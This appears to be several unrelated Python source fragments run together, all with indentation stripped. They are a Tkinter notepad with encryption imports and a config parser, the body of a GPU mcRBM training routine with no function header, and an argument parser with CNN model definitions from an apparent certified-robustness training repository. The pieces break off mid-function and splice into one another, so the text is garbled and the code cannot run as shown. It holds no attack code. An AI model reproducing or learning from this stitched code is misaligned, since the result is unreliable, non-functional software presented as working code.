# To encrypt / decrypt the files
import base64
from base64 import binascii
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.fernet import Fernet, InvalidToken
# There are three Reg Ex packages that can be used: Tcl (Tkinter built-in), re (Python built-in), regex (Python package that intend to replace re in the future)
# - Tcl can do backward search but cannot do symbolic substitution
# - re can do symbolic substitution but cannot do backward search
# - regex can do both
# So we go with regex.
#
# Difference between Python re and Tcl RegEx
# http://www.greenend.org.uk/rjk/tech/regexp.html
# https://bugs.python.org/issue516762
# https://pypi.org/project/regex/
import regex as re # This is *different* from 'import re'
import webbrowser # To create a hyperlink to a regex tutorial website
import configparser
import ast
# https://stackoverflow.com/questions/214359/converting-hex-color-to-rgb-and-vice-versa
# https://stackoverflow.com/a/40809696
def hex_to_rgb(hex):
"""Return (red, green, blue) for the color given as #rrggbb."""
hex = hex.lstrip('#')
lv = len(hex)
return tuple(int(hex[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))
# 16-bit RGB (each component is max 65535) to hex
# For 8-bit, we need to use '#%02x%02x%02x' % rgb, but we don't need for this
# https://bugs.python.org/issue33289
def rgb16_to_hex(rgb):
"""Return color as #rrggbb for the given color values."""
return '#%04x%04x%04x' % rgb
# https://stackoverflow.com/questions/596216/formula-to-determine-brightness-of-rgb-color
# On the scale of RGB (0-255 for 8-bit, 0-65535 for 16-bit)
def rgb_to_brightness(rgb):
return 0.2126*rgb[0] + 0.7152*rgb[1] + 0.0722*rgb[2]
# Hex can be either #ffffffffffff or #ffffff; this works for both.
# On the scale of 0.0 - 1.0
def hex_to_brightness(hex):
return rgb_to_brightness(hex_to_rgb(hex)) / (16**((len(hex)-1)//3)-1)
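# Examples (own addition):
#     hex_to_brightness('#ffffff')  # -> 1.0, pure white
#     hex_to_brightness('#000000')  # -> 0.0, pure black
# A 16-bit hex such as '#ffffffffffff' normalizes the same way.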
class ConfigParser2(configparser.ConfigParser):
def __init__(self, *args, **kwargs):
configparser.ConfigParser.__init__(self, *args, **kwargs)
# get with a default value option
def get2(self, section, option, default):
if not self.has_section(section):
self.add_section(section)
if not self.has_option(section, option):
self.set(section, option, default)
return self.get(section, option)
# getint with a default value option
# if no section / option, add the default value to self and returns it
# if an existing option is not of int type, then set it to default and returns it
def getint2(self, section, option, default):
if not self.has_section(section):
self.add_section(section)
if not self.has_option(section, option):
self.set(section, option, str(default))
try:
return self.getint(section, option)
except ValueError:
self.set(section, option, str(default))
return self.getint(section, option)
# getboolean with a default value option
# if no section / option, add the default value to self and returns it
# if an existing option is not of boolean type, then set it to default and returns it
def getboolean2(self, section, option, default):
if not self.has_section(section):
self.add_section(section)
if not self.has_option(section, option):
self.set(section, option, str(default))
try:
return self.getboolean(section, option)
except ValueError:
self.set(section, option, str(default))
return self.getboolean(section, option)
def read(self, file):
self.config_file = file
super().read(file)
def write2(self):
f = open(self.config_file, 'w')
self.write(f)
f.close()
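# Usage sketch (own addition; file and option names are illustrative):
#     cp = ConfigParser2()
#     cp.read('settings.ini')
#     size = cp.getint2('settings', 'size', 10)  # inserts 10 if the option is absent
#     cp.write2()  # persists any defaults added by the get*2 calls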
class Notepad(ttk.Frame):
def __init__(self, *args, cp='', salt=b'salt_', iterations=100000, **kwargs):
ttk.Frame.__init__(self, *args, **kwargs)
self.text = tk.Text(self, undo=True, autoseparators=True)
self.vscroll = ttk.Scrollbar(self, orient='vertical')
self.hscroll = ttk.Scrollbar(self, orient='horizontal')
self.menu = tk.Menu(self)
self.master.config(menu=self.menu)
# Implement status bar as a Frame with three gridded Labels
# http://zetcode.com/tkinter/layout/
self.status = ttk.Frame(self)
self.status.misc = tk.Label(self.status, bd=1, relief='sunken', text='', anchor='w')
self.status.misc.grid(row=1, column=0, sticky='sew')
self.status.cursor = tk.Label(self.status, bd=1, relief='sunken', text='', anchor='w')
self.status.cursor.grid(row=1, column=1, sticky='sew')
self.status.count = tk.Label(self.status, bd=1, relief='sunken', text='', anchor='w')
self.status.count.grid(row=1, column=2, sticky='sew')
#self.status.encoding = tk.Label(self.status, bd=1, relief='sunken', text='', anchor='w')
#self.status.encoding.grid(row=1, column=3, sticky='sew')
# Evenly space status bars
# https://webcache.googleusercontent.com/search?q=cache:3h0isl3ZrqEJ:https://www.e-learn.cn/topic/3015315+&cd=4&hl=en&ct=clnk&gl=us&client=firefox-b-1-d
self.status.grid_columnconfigure(0, weight=1, uniform='a')
self.status.grid_columnconfigure(1, weight=1, uniform='a')
self.status.grid_columnconfigure(2, weight=1, uniform='a')
#self.status.grid_columnconfigure(3, weight=1, uniform='a')
self.hscroll.show = lambda: self.hscroll.grid(row=1, column=0, sticky='ew')
self.hscroll.hide = lambda: self.hscroll.grid_forget()
self.status.show = lambda: self.status.grid(row=2, column=0, columnspan=2, sticky='esw')
self.status.hide = lambda: self.status.grid_forget()
self.text.grid(row=0, column=0, sticky='nesw')
self.vscroll.grid(row=0, column=1, sticky='nes')
self.hscroll.show()
self.status.show()
self.grid_columnconfigure(0, weight=1)
self.grid_rowconfigure(0, weight=1)
self.vscroll.config(command=self.text.yview)
self.hscroll.config(command=self.text.xview)
self.text.configure(yscrollcommand=self.vscroll.set)
self.text.configure(xscrollcommand=self.hscroll.set)
#self.text.bind('<<CursorChange>>', self._on_change)
#self.text.bind('<<Selection>>', self._on_change)
# Beware that these hacks do not support direct text/cursor modifications by executing insert(), tag_add('sel'), etc.
self.text.bind('<KeyRelease>', self._on_change)
self.text.bind('<ButtonRelease-1>', self._on_change)
self.text.bind('<B1-Motion>', self._on_change)
self.text.bind('<<Selection>>', self._on_selection)
self.fpath = '' # file path
self.fname = 'Untitled' # file name
self.key1 = None # master key for read-only key encryption
self.key2 = None # read-only key for text encryption
self.salt = salt # salt for encryption
self.iter = iterations # iterations for encryption
#self.text.tag_configure('match', foreground='white', background='royal blue')
self.text.tag_configure('match', foreground=self.text.tag_cget('sel', 'foreground'), background=self.text.tag_cget('sel', 'background'))
self.text.tag_configure('find all', background='orange red')
self.text.tag_raise('sel')
self.rect_select_on = tk.BooleanVar()
self.wrap_type = tk.IntVar()
self.status_on = tk.BooleanVar()
# use configparser to load settings
self.cp = cp
# text format
self.font = font.Font(
family=self.cp.get2('settings', 'font', 'Courier New'),
size=self.cp.getint2('settings', 'size', 10),
weight='bold' if self.cp.getboolean2('settings', 'bold', False) else 'normal',
slant='italic' if self.cp.getboolean2('settings', 'italic', False) else 'roman',
underline=self.cp.getboolean2('settings', 'underline', False),
overstrike=self.cp.getboolean2('settings', 'strikeout', False)
)
# color
self.text.config(font=self.font,
foreground=self.cp.get2('settings', 'text_color', self.text.cget('foreground')),
background=self.cp.get2('settings', 'background_color', self.text.cget('background'))
)
self.text.tag_configure('normal', background=self.text.cget('background'))
# adjust the cursor color
if rgb_to_brightness(self.winfo_rgb(self.text.cget('background'))) / 65535 > 0.5: # winfo_rgb gives 16-bit components, so normalize; Bright => make the cursor black
    self.text.config(insertbackground='black')
else: # Dark => make the cursor white
    self.text.config(insertbackground='white')
# misc
self.wrap_type.set(self.cp.getint2('settings', 'wrap_type', 0))
self.status_on.set(self.cp.getboolean2('settings', 'status_bar', True))
# search settings
self.fr = self.FindReplace(self,
ignorecase=self.cp.getboolean2('settings', 'ignore_case', True),
wholeword=self.cp.getboolean2('settings', 'whole_word', False),
withinsel=self.cp.getboolean2('settings', 'within_selection', False),
regexp=self.cp.getboolean2('settings', 'regular_expression', False)
)
self.fr.withdraw()
# recent files
self.recent_files = ast.literal_eval(self.cp.get2('settings', 'recent_files', '[]'))
self.menu_file = tk.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='File', underline=0, menu=self.menu_file)
self.menu_file.add_command(label='New', underline=0, command=self._on_new_file, accelerator='Ctrl+N')
self.text.bind('<Control-n>', self._on_new_file)
self.menu_file.add_command(label='Open...', underline=0, command=self._on_open_file, accelerator='Ctrl+O')
self.text.bind('<Control-o>', self._on_open_file)
self.menu_file.add_command(label='Save', underline=0, command=self._on_save_file, accelerator='Ctrl+S')
self.text.bind('<Control-s>', self._on_save_file)
self.menu_file.add_command(label='Save As...', underline=5, command=self._on_save_file_as, accelerator='Ctrl+Shift+S')
self.text.bind('<Control-Shift-S>', self._on_save_file_as) # with Shift held, the keysym is uppercase 'S'
self.menu_file.add_separator()
''' train : modified version of the original train function.
Additions : GPU selection (useful for multi-GPU machines)
Saving the sum of the square of the data for post-processing
Visible data are saved
Data samples are permuted for training
Weights are saved every 100 training epochs
Training energy is visualized every 100 training epochs
NOTE : the annealed learning rate used in the initial code is NOT used here!
'''
#plt.ion()
f1 = plt.figure()
ax1 = f1.add_subplot(111)
#ax2 = f1.add_subplot(122)
#plt.show()
cmt.cuda_set_device(self.gpuId)
cmt.cublas_init()
cmt.CUDAMatrix.init_random(1)
np.random.seed(self.npRandSeed)
prng = RandomState(self.npRandState)
################################################################
##################### CHANGE PATH ##############################
# Move to current experiment path:
os.chdir(self.saveDir)
# Get current path:
os.getcwd()
self.plotsDir = 'plots'
#self.probabilitiesDir = 'p_all'
if not os.path.isdir(self.plotsDir):
os.makedirs(self.plotsDir)
if not os.path.isdir(self.plotsDir + '/energy'):
os.makedirs(self.plotsDir + '/energy')
#if not os.path.isdir(self.probabilitiesDir):
# os.makedirs(self.probabilitiesDir)
if not os.path.isdir('weights'):
os.makedirs('weights')
d = self.d.astype(np.float32)
print("visible size: ", d.shape)
dsq = np.square(d)
lsq = np.sum(dsq, axis=0)
with open('lsqComplete.pkl', 'wb') as pklFile:
cPickle.dump(lsq, pklFile)
del dsq, lsq
# Save visible data :
visData = d
np.savez('visData.npz', data=d, obsKeys=self.obsKeys, epochTime=self.epochTime)
with open ('visData.txt','w') as f:
f.write("\n Dataset : %s" %(self.dataFilename))
f.write("\n visData size: %s " % str(visData.shape))
f.write("\n visData type: %s " % str(visData.dtype))
f.write("\n \n visData Range: %s " % str(np.max(visData, axis=0)-np.min(visData, axis=0)))
f.write("\n \n visData min: %s " % str(np.min(visData, axis=0)))
f.write("\n \n visData max: %s " % str(np.max(visData, axis=0)))
f.write("\n \n visData mean: %s " % str(np.mean(visData, axis=0)))
f.write("\n \n visData std: %s " % str(np.std(visData, axis=0)))
f.close()
del visData #if not needed for computing the latent states
permIdx = prng.permutation(d.shape[0])
d = d[permIdx,:]
#subsetting train and test datasets
#trainPerc = 0.7
#trainSampNum = int(np.ceil(trainPerc*d.shape[0]))
#trainSampNum = int(np.floor(trainSampNum/self.batch_size)*self.batch_size)
#testSampNum = int(d.shape[0]-trainSampNum-1)
# The test dataset is not used at the moment, it can be used as
# a validation set to check for overfitting. To use it, uncomment
# all the variables with 'test' in their name
#~ d_test = d[trainSampNum+1:,:]
#d = d[:trainSampNum,:]
#obsKeys = self.obsKeys[:trainSampNum]
totnumcases = d.shape[0]
num_vis = d.shape[1]
num_batches = int(totnumcases/self.batch_size)
print("num_batches: ", num_batches)
dev_dat = cmt.CUDAMatrix(d.T) # VxP
#~ test_dat = cmt.CUDAMatrix(d_test.T)
del d, self.d, self.epochTime, self.obsKeys
# training parameters (as in the original code by Ranzato)
epsilon = self.epsilon
epsilonVF = 2*epsilon
epsilonFH = 0.02*epsilon
epsilonb = 0.02*epsilon
epsilonw_mean = 0.2*epsilon
epsilonb_mean = 0.1*epsilon
weightcost_final = self.weightcost_final
# HMC setting
hmc_step_nr = self.hmc_step_nr
hmc_step = 0.01
hmc_target_ave_rej = self.hmc_target_ave_rej
hmc_ave_rej = hmc_target_ave_rej
# initialize weights
VF = cmt.CUDAMatrix(np.array(0.02 * prng.randn(num_vis, self.num_fac), dtype=np.float32, order='F')) # VxH
if self.apply_mask == 0:
FH = cmt.CUDAMatrix( np.array( np.eye(self.num_fac,self.num_hid_cov), dtype=np.float32, order='F') ) # HxO
else:
dd = loadmat('your_FHinit_mask_file.mat') # see CVPR2010paper_material/topo2D_3x3_stride2_576filt.mat for an example
FH = cmt.CUDAMatrix( np.array( dd["FH"], dtype=np.float32, order='F') )
bias_cov = cmt.CUDAMatrix( np.array(2.0*np.ones((self.num_hid_cov, 1)), dtype=np.float32, order='F') )
bias_vis = cmt.CUDAMatrix( np.array(np.zeros((num_vis, 1)), dtype=np.float32, order='F') )
w_mean = cmt.CUDAMatrix( np.array( 0.05 * prng.randn(num_vis, self.num_hid_mean), dtype=np.float32, order='F') ) # VxH
bias_mean = cmt.CUDAMatrix( np.array( -2.0*np.ones((self.num_hid_mean,1)), dtype=np.float32, order='F') )
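# Shape summary (own annotation, restating the comments above): VF (V x num_fac)
# maps visibles to factors, FH (num_fac x num_hid_cov) maps squared factor
# activations to covariance hiddens, and w_mean/bias_mean parameterize the mean hiddens.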
# initialize variables to store derivatives
VFinc = cmt.CUDAMatrix( np.array(np.zeros((num_vis, self.num_fac)), dtype=np.float32, order='F'))
FHinc = cmt.CUDAMatrix( np.array(np.zeros((self.num_fac, self.num_hid_cov)), dtype=np.float32, order='F'))
bias_covinc = cmt.CUDAMatrix( np.array(np.zeros((self.num_hid_cov, 1)), dtype=np.float32, order='F'))
bias_visinc = cmt.CUDAMatrix( np.array(np.zeros((num_vis, 1)), dtype=np.float32, order='F'))
w_meaninc = cmt.CUDAMatrix( np.array(np.zeros((num_vis, self.num_hid_mean)), dtype=np.float32, order='F'))
bias_meaninc = cmt.CUDAMatrix( np.array(np.zeros((self.num_hid_mean, 1)), dtype=np.float32, order='F'))
# initialize temporary storage
data = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F')) # VxP
normdata = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F')) # VxP
negdataini = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F')) # VxP
feat = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, self.batch_size)), dtype=np.float32, order='F'))
featsq = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, self.batch_size)), dtype=np.float32, order='F'))
negdata = cmt.CUDAMatrix( np.array(prng.randn(num_vis, self.batch_size), dtype=np.float32, order='F'))
old_energy = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F'))
new_energy = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F'))
energy = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F'))
gradient = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F')) # VxP
normgradient = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F')) # VxP
thresh = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F'))
feat_mean = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_mean, self.batch_size)), dtype=np.float32, order='F'))
vel = cmt.CUDAMatrix( np.array(prng.randn(num_vis, self.batch_size), dtype=np.float32, order='F'))
length = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F')) # 1xP
lengthsq = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F')) # 1xP
normcoeff = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F')) # 1xP
# commented to avoid computing the energy on test data
#~ data_test = cmt.CUDAMatrix( np.array(np.empty((num_vis, testSampNum)), dtype=np.float32, order='F')) # Vxtest_batch
#~ normdata_test = cmt.CUDAMatrix( np.array(np.empty((num_vis, testSampNum)), dtype=np.float32, order='F')) # Vxtest_batch
#~ length_test = cmt.CUDAMatrix( np.array(np.zeros((1, testSampNum)), dtype=np.float32, order='F')) # 1xtest_batch
#~ lengthsq_test = cmt.CUDAMatrix( np.array(np.zeros((1, testSampNum)), dtype=np.float32, order='F')) # 1xtest_batch
#~ normcoeff_test = cmt.CUDAMatrix( np.array(np.zeros((1, testSampNum)), dtype=np.float32, order='F')) # 1xtest_batch
#~ vel_test = cmt.CUDAMatrix( np.array(prng.randn(num_vis, testSampNum), dtype=np.float32, order='F'))
#~ feat_test = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, testSampNum)), dtype=np.float32, order='F'))
#~ featsq_test = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, testSampNum)), dtype=np.float32, order='F'))
#~ feat_mean_test = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_mean, testSampNum)), dtype=np.float32, order='F'))
#~ energy_test = cmt.CUDAMatrix( np.array(np.zeros((1, testSampNum)), dtype=np.float32, order='F'))
if self.apply_mask==1: # this is used to constrain very large FH matrices, only allowing values to change within a neighborhood
dd = loadmat('your_FHinit_mask_file.mat')
mask = cmt.CUDAMatrix( np.array(dd["mask"], dtype=np.float32, order='F'))
normVF = 1
small = 0.5
# other temporary vars
t1 = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_cov, self.batch_size)), dtype=np.float32, order='F'))
t2 = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_cov, self.batch_size)), dtype=np.float32, order='F'))
t3 = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, self.batch_size)), dtype=np.float32, order='F'))
t4 = cmt.CUDAMatrix( np.array(np.empty((1,self.batch_size)), dtype=np.float32, order='F'))
t5 = cmt.CUDAMatrix( np.array(np.empty((1,1)), dtype=np.float32, order='F'))
t6 = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F'))
t7 = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F'))
t8 = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.num_fac)), dtype=np.float32, order='F'))
t9 = cmt.CUDAMatrix( np.array(np.zeros((self.num_fac, self.num_hid_cov)), dtype=np.float32, order='F'))
t10 = cmt.CUDAMatrix( np.array(np.empty((1,self.num_fac)), dtype=np.float32, order='F'))
t11 = cmt.CUDAMatrix( np.array(np.empty((1,self.num_hid_cov)), dtype=np.float32, order='F'))
# commented to avoid computing the energy on test data
#~ t1_test = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_cov, testSampNum)), dtype=np.float32, order='F'))
#~ t2_test = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_cov, testSampNum)), dtype=np.float32, order='F'))
#~ t3_test = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, testSampNum)), dtype=np.float32, order='F'))
#~ t4_test = cmt.CUDAMatrix( np.array(np.empty((1,testSampNum)), dtype=np.float32, order='F'))
#~ t5_test = cmt.CUDAMatrix( np.array(np.empty((1,1)), dtype=np.float32, order='F'))
#~ t6_test = cmt.CUDAMatrix( np.array(np.empty((num_vis, testSampNum)), dtype=np.float32, order='F'))
meanEnergy = np.zeros(self.num_epochs)
minEnergy = np.zeros(self.num_epochs)
maxEnergy = np.zeros(self.num_epochs)
#~ meanEnergy_test = np.zeros(self.num_epochs)
#~ minEnergy_test = np.zeros(self.num_epochs)
#~ maxEnergy_test = np.zeros(self.num_epochs)
# start training
for epoch in range(self.num_epochs):
print ("Epoch " + str(epoch))
# anneal learning rates as found in the original code -
# uncomment if you wish to use annealing!
#~ epsilonVFc = epsilonVF/max(1,epoch/20)
#~ epsilonFHc = epsilonFH/max(1,epoch/20)
#~ epsilonbc = epsilonb/max(1,epoch/20)
#~ epsilonw_meanc = epsilonw_mean/max(1,epoch/20)
#~ epsilonb_meanc = epsilonb_mean/max(1,epoch/20)
# no annealing is used in our experiments because learning
# was stopping too early
epsilonVFc = epsilonVF
epsilonFHc = epsilonFH
epsilonbc = epsilonb
epsilonw_meanc = epsilonw_mean
epsilonb_meanc = epsilonb_mean
weightcost = weightcost_final
if epoch <= self.startFH:
epsilonFHc = 0
if epoch <= self.startwd:
weightcost = 0
# commented to avoid computing the energy on test data
#~ data_test = test_dat
#~ data_test.mult(data_test, target = t6_test) # DxP
#~ t6_test.sum(axis = 0, target = lengthsq_test) # 1xP
#~ lengthsq_test.mult(1./num_vis) # normalize by number of components (like std)
#~ lengthsq_test.add(small) # small avoids division by 0
#~ cmt.sqrt(lengthsq_test, target = length_test)
#~ length_test.reciprocal(target = normcoeff_test) # 1xP
#~ data_test.mult_by_row(normcoeff_test, target = normdata_test) # normalized data
for batch in range(num_batches):
# get current minibatch
data = dev_dat.slice(batch*self.batch_size,(batch + 1)*self.batch_size) # DxP (nr dims x nr samples)
# normalize input data
data.mult(data, target = t6) # DxP
t6.sum(axis = 0, target = lengthsq) # 1xP
lengthsq.mult(1./num_vis) # normalize by number of components (like std)
lengthsq.add(small) # small avoids division by 0
cmt.sqrt(lengthsq, target = length)
length.reciprocal(target = normcoeff) # 1xP
data.mult_by_row(normcoeff, target = normdata) # normalized data
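# i.e. normdata = data / sqrt(sum(data^2, axis=0)/num_vis + small): each sample
# (column) is scaled to roughly unit length before the covariance pass.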
## compute positive sample derivatives
# covariance part
cmt.dot(VF.T, normdata, target = feat) # HxP (nr facs x nr samples)
feat.mult(feat, target = featsq) # HxP
cmt.dot(FH.T,featsq, target = t1) # OxP (nr cov hiddens x nr samples)
t1.mult(-0.5)
t1.add_col_vec(bias_cov) # OxP
t1.apply_sigmoid(target = t2) # OxP
cmt.dot(featsq, t2.T, target = FHinc) # HxO
cmt.dot(FH,t2, target = t3) # HxP
t3.mult(feat)
# Repository: sungyoon-lee/bcp
# -*- coding: utf-8 -*-
### basic modules
import numpy as np
import time, pickle, os, sys, json, PIL, tempfile, warnings, importlib, math, copy, shutil
### torch modules
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR, MultiStepLR
import torch.nn.functional as F
from torch import autograd
from torch.utils.data import Dataset, DataLoader, TensorDataset
import argparse
def argparser(data='cifar10', model='large',
batch_size=128, epochs=200, warmup=10, rampup=121,
augmentation=True,
seed=0, verbose=200,
epsilon=36/255, epsilon_infty=8/255, epsilon_train=36/255, epsilon_train_infty=8/255, starting_epsilon=0.0,
opt='adam', lr=0.001, momentum=0.9, weight_decay=0.0, step_size=10, gamma=0.5, lr_scheduler='step', wd_list=None,
starting_kappa=1.0, kappa=0.0,
niter=100,
opt_iter=1, sniter=1, test_opt_iter=1000, test_sniter=1000000):
parser = argparse.ArgumentParser()
# main settings
parser.add_argument('--method', default='BCP')
parser.add_argument('--rampup', type=int, default=rampup) ## rampup
parser.add_argument('--warmup', type=int, default=warmup)
parser.add_argument('--sniter', type=int, default=sniter) ###
parser.add_argument('--opt_iter', type=int, default=opt_iter)
parser.add_argument('--linfty', action='store_true')
parser.add_argument('--no_save', action='store_true')
parser.add_argument('--test_pth', default=None)
parser.add_argument('--print', action='store_true')
parser.add_argument('--bce', action='store_true')
parser.add_argument('--pgd', action='store_true')
# optimizer settings
parser.add_argument('--opt', default='adam')
parser.add_argument('--momentum', type=float, default=momentum)
parser.add_argument('--weight_decay', type=float, default=weight_decay)
parser.add_argument('--epochs', type=int, default=epochs)
parser.add_argument("--lr", type=float, default=lr)
parser.add_argument("--step_size", type=int, default=step_size)
parser.add_argument("--gamma", type=float, default=gamma)
parser.add_argument("--wd_list", nargs='*', type=int, default=wd_list)
parser.add_argument("--lr_scheduler", default=lr_scheduler)
# test settings during training
parser.add_argument('--train_method', default='BCP')
parser.add_argument('--test_sniter', type=int, default=test_sniter)
parser.add_argument('--test_opt_iter', type=int, default=test_opt_iter)
# pgd settings
parser.add_argument("--epsilon_pgd", type=float, default=epsilon)
parser.add_argument("--alpha", type=float, default=epsilon/4)
parser.add_argument("--niter", type=float, default=niter)
# epsilon settings
parser.add_argument("--epsilon", type=float, default=epsilon)
parser.add_argument("--epsilon_infty", type=float, default=epsilon_infty)
parser.add_argument("--epsilon_train", type=float, default=epsilon_train)
parser.add_argument("--epsilon_train_infty", type=float, default=epsilon_train_infty)
parser.add_argument("--starting_epsilon", type=float, default=starting_epsilon)
parser.add_argument('--schedule_length', type=int, default=rampup) ## rampup
# kappa settings
parser.add_argument("--kappa", type=float, default=kappa)
parser.add_argument("--starting_kappa", type=float, default=starting_kappa)
parser.add_argument('--kappa_schedule_length', type=int, default=rampup) ## rampup
# model arguments
parser.add_argument('--model', default='large')
parser.add_argument('--model_factor', type=int, default=8)
parser.add_argument('--resnet_N', type=int, default=1)
parser.add_argument('--resnet_factor', type=int, default=1)
# other arguments
parser.add_argument('--prefix')
parser.add_argument('--data', default=data)
parser.add_argument('--real_time', action='store_true')
parser.add_argument('--seed', type=int, default=2019)
parser.add_argument('--verbose', type=int, default=200)
parser.add_argument('--cuda_ids', type=int, default=0)
# loader arguments
parser.add_argument('--batch_size', type=int, default=batch_size)
parser.add_argument('--test_batch_size', type=int, default=batch_size)
parser.add_argument('--normalization', action='store_true')
parser.add_argument('--no_augmentation', action='store_true', default=not(augmentation))
parser.add_argument('--drop_last', action='store_true')
parser.add_argument('--no_shuffle', action='store_true')
args = parser.parse_args()
args.augmentation = not(args.no_augmentation)
args.shuffle = not(args.no_shuffle)
args.save = not(args.no_save)
if args.rampup:
args.schedule_length = args.rampup
args.kappa_schedule_length = args.rampup
if args.epsilon_train is None:
args.epsilon_train = args.epsilon
if args.epsilon_train_infty is None:
args.epsilon_train_infty = args.epsilon_infty
if args.linfty:
print('LINFTY TRAINING')
args.epsilon = args.epsilon_infty
args.epsilon_train = args.epsilon_train_infty
args.epsilon_pgd = args.epsilon
args.alpha = args.epsilon/4
if args.starting_epsilon is None:
args.starting_epsilon = args.epsilon
if args.prefix:
args.prefix = 'models/'+args.data+'/'+args.prefix
if args.model is not None:
args.prefix += '_'+args.model
if args.method is not None:
args.prefix += '_'+args.method
banned = ['verbose', 'prefix',
'resume', 'baseline', 'eval',
'method', 'model', 'cuda_ids', 'load', 'real_time',
'test_batch_size', 'augmentation','batch_size','drop_last','normalization',
'print','save','step_size','epsilon','gamma','linfty','lr_scheduler',
'seed','shuffle','starting_epsilon','kappa','kappa_schedule_length',
'test_sniter','test_opt_iter', 'niter','epsilon_pgd','alpha','schedule_length',
'epsilon_infty','epsilon_train_infty','test_pth','wd_list','momentum', 'weight_decay',
'resnet_N', 'resnet_factor','bce','no_augmentation','no_shuffle','no_save','pgd']
if args.method == 'baseline':
banned += ['epsilon', 'starting_epsilon', 'schedule_length',
'l1_test', 'l1_train', 'm', 'l1_proj']
# if not using a model that uses model_factor,
# ignore model_factor
if args.model not in ['wide', 'deep']:
banned += ['model_factor']
for arg in sorted(vars(args)):
if arg not in banned and getattr(args,arg) is not None:
args.prefix += '_' + arg + '_' +str(getattr(args, arg))
if args.schedule_length > args.epochs:
raise ValueError('Schedule length for epsilon ({}) is greater than '
'number of epochs ({})'.format(args.schedule_length, args.epochs))
else:
args.prefix = 'models/'+args.data+'/temporary'
if args.cuda_ids is not None:
print('Setting CUDA_VISIBLE_DEVICES to {}'.format(args.cuda_ids))
# os.environ['CUDA_VISIBLE_DEVICES'] = args.cuda_ids
torch.cuda.set_device(args.cuda_ids)
return args
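# Minimal usage sketch (illustrative, not part of the original file): argparser() parses sys.argv,
# derives args.prefix and the epsilon/kappa schedules, and pins the CUDA device, e.g.
#   args = argparser(data='cifar10', model='large')
#   model = select_model(args.data, args.model)
#   print(args.prefix, args.epsilon_train, args.schedule_length)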
def select_model(data, m):
if data=='mnist':
if m == 'large': ### Wong et al. large
model = mnist_model_large().cuda()
elif m == 'large2': ### Wong et al. large
model = mnist_model_large2().cuda()
else: ### Wong et al. small
model = mnist_model().cuda()
elif data=='cifar10':
if m == 'large': ### Wong et al. large
model = cifar_model_large().cuda()
elif m == 'M': ### CROWN-IBP M
model = cifar_model_M().cuda()
elif m == 'CIBP': ### CROWN-IBP
print('CIBP model')
model = model_cnn_4layer(3,32,8,512).cuda()
elif m == 'CIBP_noinit': ### CROWN-IBP
print('CIBP model no init')
model = model_cnn_4layer_noinit(3,32,8,512).cuda()
elif m == 'c6f2':
model = c6f2().cuda()
elif m == 'c6f2_':
model = c6f2_().cuda()
else: ### Wong et al. small
model = cifar_model().cuda()
elif data=='tinyimagenet':
model = tinyimagenet().cuda()
return model
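# Example (illustrative): select_model('cifar10', 'large') builds cifar_model_large() on the current
# CUDA device; unrecognised model names fall back to the small Wong et al. architecture for that dataset.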
def mnist_model():
model = nn.Sequential(
nn.Conv2d(1, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(32*7*7,100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
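# Shape check (illustrative): a 1x28x28 MNIST image -> Conv(4, stride 2, pad 1) -> 16x14x14
# -> Conv(4, stride 2, pad 1) -> 32x7x7 -> Flatten -> 1568, matching nn.Linear(32*7*7, 100) above.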
def mnist_model_large():
model = nn.Sequential(
nn.Conv2d(1, 32, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(64*7*7,512),
nn.ReLU(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512,10)
)
return model
def mnist_model_large2():
model = nn.Sequential(
nn.Conv2d(1, 32, 3, stride=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2),
nn.ReLU(),
Flatten(),
nn.Linear(1024,512),
nn.ReLU(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512,10)
)
return model
def cifar_model():
model = nn.Sequential(
